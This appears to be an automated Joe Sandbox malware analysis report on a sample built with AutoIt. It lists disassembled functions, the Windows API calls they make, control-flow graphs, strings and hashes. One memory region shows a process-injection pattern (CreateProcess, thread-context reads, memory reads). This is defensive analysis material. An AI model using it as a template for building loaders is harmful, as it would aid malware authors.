                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 8939a3b52581f246d8b9bd1b3532d7dc9f4959623361f0f0fb70484db46cd970
                                                            • Instruction ID: bd2dc5ff6e8127f47c3967433bf237de8c4a32f2bc57e3651e6f4f6831b0212b
                                                            • Opcode Fuzzy Hash: 8939a3b52581f246d8b9bd1b3532d7dc9f4959623361f0f0fb70484db46cd970
                                                            • Instruction Fuzzy Hash: 7621E3B1901308AFDB01DFA4E888BDEBBF4FB08701F04412AF911EA3A0D7B145448FA5
                                                            Function 00CD708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00CD4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D952F8,?,00CD37AE,?), ref: 00CD4724
                                                              • Part of subcall function 00CF050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00CD7165), ref: 00CF052D
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00CD71A8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D0E8C8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D0E909
                                                            • RegCloseKey.ADVAPI32(?), ref: 00D0E947
                                                            • _wcscat.LIBCMT ref: 00D0E9A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: 371e1ecf72a91a7ed0abbad9c3c6389db36d212787ea2474590af1969928675e
                                                            • Instruction ID: 63aa234b0094c858542263f10ca03efad64a29ceac7fc2aa219259ab2d832d84
                                                            • Opcode Fuzzy Hash: 371e1ecf72a91a7ed0abbad9c3c6389db36d212787ea2474590af1969928675e
                                                            • Instruction Fuzzy Hash: C9716B715093019EC704EF69E8419ABBBE8FF85350B440A2FF549C73A0EB71D948DBA6
                                                            Function 00CD3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00CD3A50
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00CD3A5F
                                                            • LoadIconW.USER32(00000063), ref: 00CD3A76
                                                            • LoadIconW.USER32(000000A4), ref: 00CD3A88
                                                            • LoadIconW.USER32(000000A2), ref: 00CD3A9A
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00CD3AC0
                                                            • RegisterClassExW.USER32(?), ref: 00CD3B16
                                                              • Part of subcall function 00CD3041: GetSysColorBrush.USER32(0000000F), ref: 00CD3074
                                                              • Part of subcall function 00CD3041: RegisterClassExW.USER32(00000030), ref: 00CD309E
                                                              • Part of subcall function 00CD3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CD30AF
                                                              • Part of subcall function 00CD3041: InitCommonControlsEx.COMCTL32(?), ref: 00CD30CC
                                                              • Part of subcall function 00CD3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CD30DC
                                                              • Part of subcall function 00CD3041: LoadIconW.USER32(000000A9), ref: 00CD30F2
                                                              • Part of subcall function 00CD3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CD3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 1b42a8d697876277efcbced4ea348486652ee7e0ad467cc069c34c4cdb1882cb
                                                            • Instruction ID: 7a0985111b7e4de40370b9ea7f67ce7099670f42c0bab76f66c08c70944d5c6f
                                                            • Opcode Fuzzy Hash: 1b42a8d697876277efcbced4ea348486652ee7e0ad467cc069c34c4cdb1882cb
                                                            • Instruction Fuzzy Hash: 4C210871900305AFEB12DFA4FC49B9D7BB5EB08711F10016AEA04EB3A5D3B556509FA8
                                                            Function 00CD3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 767 cd3633-cd3681 769 cd36e1-cd36e3 767->769 770 cd3683-cd3686 767->770 769->770 773 cd36e5 769->773 771 cd3688-cd368f 770->771 772 cd36e7 770->772 774 cd374b-cd3753 PostQuitMessage 771->774 775 cd3695-cd369a 771->775 777 cd36ed-cd36f0 772->777 778 d0d0cc-d0d0fa call ce1070 call ce1093 772->778 776 cd36ca-cd36d2 DefWindowProcW 773->776 782 cd3711-cd3713 774->782 780 d0d154-d0d168 call d32527 775->780 781 cd36a0-cd36a2 775->781 783 cd36d8-cd36de 776->783 784 cd3715-cd373c SetTimer RegisterWindowMessageW 777->784 785 cd36f2-cd36f3 777->785 813 d0d0ff-d0d106 778->813 780->782 806 d0d16e 780->806 789 cd36a8-cd36ad 781->789 790 cd3755-cd3764 call cd44a0 781->790 782->783 784->782 791 cd373e-cd3749 CreatePopupMenu 784->791 786 cd36f9-cd370c KillTimer call cd443a call cd3114 785->786 787 d0d06f-d0d072 785->787 786->782 799 d0d074-d0d076 787->799 800 d0d0a8-d0d0c7 MoveWindow 787->800 795 d0d139-d0d140 789->795 796 cd36b3-cd36b8 789->796 790->782 791->782 795->776 802 d0d146-d0d14f call d27c36 795->802 804 cd36be-cd36c4 796->804 805 d0d124-d0d134 call d32d36 796->805 808 d0d097-d0d0a3 SetFocus 799->808 809 d0d078-d0d07b 799->809 800->782 802->776 804->776 804->813 805->782 806->776 808->782 809->804 814 d0d081-d0d092 call ce1070 809->814 813->776 817 d0d10c-d0d11f call cd443a call cd434a 813->817 814->782 817->776
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00CD36D2
                                                            • KillTimer.USER32(?,00000001), ref: 00CD36FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CD371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CD372A
                                                            • CreatePopupMenu.USER32 ref: 00CD373E
                                                            • PostQuitMessage.USER32(00000000), ref: 00CD374D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: dd2450d7d9fc2142dadaec88bae5f01a15d9429a75d5046879c9bc6841f8a77d
                                                            • Instruction ID: 42de2b6e7e5d97d70afc1f777c7ecfede869fe014f5e682f1eaae7adfcbe19ca
                                                            • Opcode Fuzzy Hash: dd2450d7d9fc2142dadaec88bae5f01a15d9429a75d5046879c9bc6841f8a77d
                                                            • Instruction Fuzzy Hash: B34121B2200B85BBDB256FA8EC09B793B99EB05301F140137FB02D63E5CA709A419777
                                                            Function 00CD3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                            • API String ID: 1825951767-3513169116
                                                            • Opcode ID: 58b90c3774356270669c78de40a46c61b38a71198d67ff22a4df9749d4f31e13
                                                            • Instruction ID: 3a6a3ca2cddf4c2ca72506f59ce03eb07ae1b59430fe4ca99e3ede926bc62524
                                                            • Opcode Fuzzy Hash: 58b90c3774356270669c78de40a46c61b38a71198d67ff22a4df9749d4f31e13
                                                            • Instruction Fuzzy Hash: 25A15C7190025D9ACF05EBA4DC91AEEB779FF14300F44042BFA16B7291EF749A08DBA1
                                                            Function 013C2650 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 942 13c2650-13c26fe call 13c0000 945 13c2705-13c272b call 13c3560 CreateFileW 942->945 948 13c272d 945->948 949 13c2732-13c2742 945->949 950 13c287d-13c2881 948->950 957 13c2749-13c2763 VirtualAlloc 949->957 958 13c2744 949->958 951 13c28c3-13c28c6 950->951 952 13c2883-13c2887 950->952 954 13c28c9-13c28d0 951->954 955 13c2889-13c288c 952->955 956 13c2893-13c2897 952->956 961 13c2925-13c293a 954->961 962 13c28d2-13c28dd 954->962 955->956 963 13c2899-13c28a3 956->963 964 13c28a7-13c28ab 956->964 959 13c276a-13c2781 ReadFile 957->959 960 13c2765 957->960 958->950 965 13c2788-13c27c8 VirtualAlloc 959->965 966 13c2783 959->966 960->950 969 13c293c-13c2947 VirtualFree 961->969 970 13c294a-13c2952 961->970 967 13c28df 962->967 968 13c28e1-13c28ed 962->968 963->964 971 13c28ad-13c28b7 964->971 972 13c28bb 964->972 973 13c27cf-13c27ea call 13c37b0 965->973 974 13c27ca 965->974 966->950 967->961 975 13c28ef-13c28ff 968->975 976 13c2901-13c290d 968->976 969->970 971->972 972->951 982 13c27f5-13c27ff 973->982 974->950 978 13c2923 975->978 979 13c290f-13c2918 976->979 980 13c291a-13c2920 976->980 978->954 979->978 980->978 983 13c2801-13c2830 call 13c37b0 982->983 984 13c2832-13c2846 call 13c35c0 982->984 983->982 989 13c2848 984->989 990 13c284a-13c284e 984->990 989->950 992 13c285a-13c285e 990->992 993 13c2850-13c2854 CloseHandle 990->993 994 13c286e-13c2877 992->994 995 13c2860-13c286b VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013C2721
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013C2947
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                            • Instruction ID: 9c7e31e6fb6427a597b1ee83357aa1a0675f36c6cccb1ed5fc31666abf82cbb9
                                                            • Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                            • Instruction Fuzzy Hash: C7A10674E00209EBDB14CFA8C894BEEBBB5BF48B08F20815DE615BB281D7759E41CB54
                                                            Function 00CD39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1073 cd39d5-cd3a45 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00CD3A03
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00CD3A24
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00CD3A38
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00CD3A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 576909e8ad3722796d254c7bb7d100f7a1fdf87abc3a53bb353c2c9c0b58901c
                                                            • Instruction ID: 73f6aaf473f5b6301f37371987411a47d718d00a381607026b79ea068beac5b4
                                                            • Opcode Fuzzy Hash: 576909e8ad3722796d254c7bb7d100f7a1fdf87abc3a53bb353c2c9c0b58901c
                                                            • Instruction Fuzzy Hash: 09F03A705007907EEA3257237C08E2B2E7DD7CAF51B00003ABD00E73B4C2621800CBB4
                                                            Function 013C23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1074 13c23b0-13c2545 call 13c0000 call 13c22a0 CreateFileW 1081 13c254c-13c255f 1074->1081 1082 13c2547 1074->1082 1085 13c2566-13c2580 VirtualAlloc 1081->1085 1086 13c2561 1081->1086 1083 13c2602-13c2607 1082->1083 1087 13c2584-13c259e ReadFile 1085->1087 1088 13c2582 1085->1088 1086->1083 1089 13c25a0 1087->1089 1090 13c25a2-13c25dc call 13c22e0 call 13c12a0 1087->1090 1088->1083 1089->1083 1095 13c25de-13c25f3 call 13c2330 1090->1095 1096 13c25f8-13c2600 ExitProcess 1090->1096 1095->1096 1096->1083
                                                            APIs
                                                              • Part of subcall function 013C22A0: Sleep.KERNELBASE(000001F4), ref: 013C22B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013C2538
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: GNTC9NGO4FALP278BMJLS25L02
                                                            • API String ID: 2694422964-939167856
                                                            • Opcode ID: 8258f348df83242f8894cf1a90b4e04cb20e990173444d63a332fff95989b78c
                                                            • Instruction ID: f61540f13909618e6b1bebc9158cf2ab5b8b821fc2457a6356dceaf2a28bee56
                                                            • Opcode Fuzzy Hash: 8258f348df83242f8894cf1a90b4e04cb20e990173444d63a332fff95989b78c
                                                            • Instruction Fuzzy Hash: C1718270D14289DAEB11DBA4C854BEFBB75AF15704F004099E248BB2C0D7BA0F45CB6A
                                                            Function 00CD407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1098 cd407c-cd4092 1099 cd416f-cd4173 1098->1099 1100 cd4098-cd40ad call cd7a16 1098->1100 1103 d0d3c8-d0d3d7 LoadStringW 1100->1103 1104 cd40b3-cd40d3 call cd7bcc 1100->1104 1107 d0d3e2-d0d3fa call cd7b2e call cd6fe3 1103->1107 1104->1107 1108 cd40d9-cd40dd 1104->1108 1117 cd40ed-cd416a call cf2de0 call cd454e call cf2dbc Shell_NotifyIconW call cd5904 1107->1117 1120 d0d400-d0d41e call cd7cab call cd6fe3 call cd7cab 1107->1120 1110 cd4174-cd417d call cd8047 1108->1110 1111 cd40e3-cd40e8 call cd7b2e 1108->1111 1110->1117 1111->1117 1117->1099 1120->1117
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D0D3D7
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            • _memset.LIBCMT ref: 00CD40FC
                                                            • _wcscpy.LIBCMT ref: 00CD4150
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CD4160
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: 2721d5be864ff6490c1c536413ecb4f4cb2cc4b4b0022ce6f9fa18eaf9dbcd14
                                                            • Instruction ID: 573775eba4ea051c67b8cde821848c746b4bf1261b25b1c83ecaa8994c100654
                                                            • Opcode Fuzzy Hash: 2721d5be864ff6490c1c536413ecb4f4cb2cc4b4b0022ce6f9fa18eaf9dbcd14
                                                            • Instruction Fuzzy Hash: 4031AF71008705AFD725EB60EC46FEB77D8AF44300F10462FF789922A1EB70A648D7A6
                                                            Function 00CD686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1133 cd686a-cd6891 call cd4ddd 1136 d0e031-d0e041 call d3955b 1133->1136 1137 cd6897-cd68a5 call cd4ddd 1133->1137 1141 d0e046-d0e048 1136->1141 1137->1136 1144 cd68ab-cd68b1 1137->1144 1142 d0e067-d0e0af call cf0db6 1141->1142 1143 d0e04a-d0e04d call cd4e4a 1141->1143 1153 d0e0b1-d0e0bb 1142->1153 1154 d0e0d4 1142->1154 1147 d0e052-d0e061 call d342f8 1143->1147 1144->1147 1148 cd68b7-cd68d9 call cd6a8c 1144->1148 1147->1142 1156 d0e0cf-d0e0d0 1153->1156 1157 d0e0d6-d0e0e9 1154->1157 1158 d0e0d2 1156->1158 1159 d0e0bd-d0e0cc 1156->1159 1160 d0e260-d0e263 call cf2d55 1157->1160 1161 d0e0ef 1157->1161 1158->1157 1159->1156 1165 d0e268-d0e271 call cd4e4a 1160->1165 1162 d0e0f6-d0e0f9 call cd7480 1161->1162 1166 d0e0fe-d0e120 call cd5db2 call d373e9 1162->1166 1171 d0e273-d0e283 call cd7616 call cd5d9b 1165->1171 1177 d0e122-d0e12f 1166->1177 1178 d0e134-d0e13e call d373d3 1166->1178 1184 d0e288-d0e2b8 call d2f7a1 call cf0e2c call cf2d55 call cd4e4a 1171->1184 1180 d0e227-d0e237 call cd750f 1177->1180 1186 d0e140-d0e153 1178->1186 1187 d0e158-d0e162 call d373bd 1178->1187 1180->1166 1189 d0e23d-d0e247 call cd735d 1180->1189 1184->1171 1186->1180 1196 d0e164-d0e171 1187->1196 1197 d0e176-d0e180 call cd5e2a 1187->1197 1195 d0e24c-d0e25a 1189->1195 1195->1160 1195->1162 1196->1180 1197->1180 1202 d0e186-d0e19e call d2f73d 1197->1202 1208 d0e1a0-d0e1bf call cd7de1 call cd5904 1202->1208 1209 d0e1c1-d0e1c4 1202->1209 1233 d0e1e2-d0e1f0 call cd5db2 1208->1233 1211 d0e1f2-d0e1f5 1209->1211 1212 d0e1c6-d0e1e1 call cd7de1 call cd6839 call cd5904 1209->1212 1214 d0e215-d0e218 call d3737f 1211->1214 1215 d0e1f7-d0e200 call d2f65e 1211->1215 1212->1233 1220 d0e21d-d0e226 call cf0e2c 1214->1220 1215->1184 1227 d0e206-d0e210 call cf0e2c 1215->1227 1220->1180 1227->1166 1233->1220
                                                            APIs
                                                              • Part of subcall function 00CD4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CD4E0F
                                                            • _free.LIBCMT ref: 00D0E263
                                                            • _free.LIBCMT ref: 00D0E2AA
                                                              • Part of subcall function 00CD6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00CD6BAD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: ab0dd85a22152d96df88c616b7ec1b833fce4aeed40121bac44edd5a4a8c4f5b
                                                            • Instruction ID: 2c74ade1fa47be5598d1e5f3101d9913bded03eb1170c4cdc43d67e1697f1ca6
                                                            • Opcode Fuzzy Hash: ab0dd85a22152d96df88c616b7ec1b833fce4aeed40121bac44edd5a4a8c4f5b
                                                            • Instruction Fuzzy Hash: 4F918071900219EFCF14EFA4CC919EDB7B9FF14310F14482AF959AB2A1DB70A905DB60
                                                            Function 00CD35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00CD35A1,SwapMouseButtons,00000004,?), ref: 00CD35D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00CD35A1,SwapMouseButtons,00000004,?,?,?,?,00CD2754), ref: 00CD35F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,00CD35A1,SwapMouseButtons,00000004,?,?,?,?,00CD2754), ref: 00CD3617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: bce5fb2f38d224ee41803f51683421db3004e16e4f424450d3890483ef0558dc
                                                            • Instruction ID: 402ff0d180f0c4cc3c2b8386d68ebfd887dc94ec724b347696417eabcca2755f
                                                            • Opcode Fuzzy Hash: bce5fb2f38d224ee41803f51683421db3004e16e4f424450d3890483ef0558dc
                                                            • Instruction Fuzzy Hash: C1113675510248BADB208F68DC40EEBB7A8EF04740F00446AB905DB310D2719F419765
                                                            Function 013C12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 013C1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013C1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013C1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
